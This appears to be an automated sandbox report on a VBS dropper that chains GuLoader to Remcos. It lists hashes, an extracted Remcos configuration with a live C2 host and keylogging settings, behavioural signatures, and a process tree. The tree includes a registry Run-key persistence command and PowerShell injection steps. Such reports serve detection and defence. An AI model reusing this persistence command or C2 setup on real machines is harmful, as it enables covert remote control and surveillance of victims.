Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-05-2024 15:29

General

  • Target

    Swift 2024052130819616.vbs

  • Size

    13KB

  • MD5

    693d91041a54a578ada0c38a77634ee9

  • SHA1

    13e0a6c85203356af7d11ff4a0e74a6b9637f466

  • SHA256

    bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91

  • SHA512

    110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb

  • SSDEEP

    192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze

Malware Config

Extracted

Family

remcos

Botnet

MAY

C2

ab9001.ddns.net:9001

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    rm.exe

  • copy_folder

    Rm

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %UserProfile%

  • mouse_option

    false

  • mutex

    -L9O37N

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
        3⤵
        PID:2692
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
            4⤵
            PID:1572
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:676

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZCJV86C0MGD9C84TKO5P.temp

        Filesize

        7KB

        MD5

        b1d21c5b38c9569fb27e16cc57feb3a0

        SHA1

        e4d83a2847bc9c7806f8f130f625d8bb695ab22f

        SHA256

        cdc82a6a7045c51ec2a7b323b5718d78ed83ca1e7698a6ad1d8e76f2e0a70329

        SHA512

        9c533c9487629ce3715a2cb6d419b801a798748994b82677ba23cad9fce23df52b49971827f702b53fbebf9b6a2802078593ca77c8f8c798722adfcce3cc79e2

      • C:\Users\Admin\AppData\Roaming\Narco.Fla

        Filesize

        476KB

        MD5

        5b31fdcca43851229c6ad5c0d5124d9e

        SHA1

        95243324bfd6acd008518e233e5ac3a7a29e67a5

        SHA256

        c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842

        SHA512

        e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5

      • memory/2480-43-0x0000000001510000-0x00000000041DB000-memory.dmp

        Filesize

        44.8MB

      • memory/2480-42-0x00000000004A0000-0x0000000001502000-memory.dmp

        Filesize

        16.4MB

      • memory/2580-17-0x00000000066F0000-0x00000000093BB000-memory.dmp

        Filesize

        44.8MB

      • memory/2620-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

        Filesize

        4KB

      • memory/2620-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-18-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB

      • memory/2620-19-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

        Filesize

        4KB

      • memory/2620-6-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

      • memory/2620-5-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

      • memory/2620-46-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

        Filesize

        9.6MB